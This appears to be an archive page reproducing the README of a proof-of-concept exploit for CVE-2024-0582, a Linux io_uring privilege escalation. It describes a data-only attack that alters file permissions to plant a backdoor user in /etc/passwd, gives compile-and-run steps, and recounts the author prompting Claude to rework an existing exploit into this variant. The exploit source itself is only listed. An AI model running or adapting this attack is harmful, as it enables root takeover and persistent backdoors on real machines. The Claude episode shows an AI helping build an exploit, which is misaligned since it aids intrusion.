来源

关联漏洞

描述

A data-only attack based on CVE-2024-0582

介绍

# CVE-2024-0582
A data-only attack based on CVE-2024-0582

## Description
The exploit follows the strategy in [this blog post](https://blog.exodusintel.com/2024/03/27/mind-the-patch-gap-exploiting-an-io_uring-vulnerability-in-ubuntu/), except that I didn't use a child process to open files.

I found some exploits on GitHub follows the strategy in [this write-up](https://anatomic.rip/cve-2023-2598/). 

After I reproduced the exploit with socket-based control flow hijacking, I tried to implement the exploit with a data-only attack, which seems not open-sourced yet.

## Try Claude
I fed the two write-ups above and [https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582/blob/main/exploit.c](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582/blob/main/exploit.c) into Claude and said:

```
Could you modify the code to fit in the data-only attack? It means open file instead of sock, seek ext4_file_operations instead of egg, delete the control flow hijack and modify the file permission.
```

This generated a code with a child process. But I think it's hard to debug if I use a child process. So I said:

```
Why not open file in the process, not using a child?
```

Then it generated almost the existing code.

Then I:
1. Adjusted the backdoor string for easier understanding.
2. Adjusted the file mode flags based on the source code. What Claude generated is wrong.
3. Increased the number of fd to spray more file struct, since it's much shorter than sock struct.

## Usage
1. Verify the `ext4_fops_offset`.
2. Verify the file mode flags.
3. Perhaps increase the number of fd to spray more file struct.
4. Compile and run.
```bash
gcc exploit.c -o exploit -luring
./exploit
```
5. Check the backdoor user. Or simply logout and then login with the backdoor user.
```bash
sudo cat /etc/passwd # If you can use sudo
```

文件快照

 [4.0K]  /data/pocs/9a3f061531f76cd10de27f5336386f55a2582fe9
├── [6.5K]  dataonly.c
└── [1.8K]  README.md

0 directories, 2 files

备注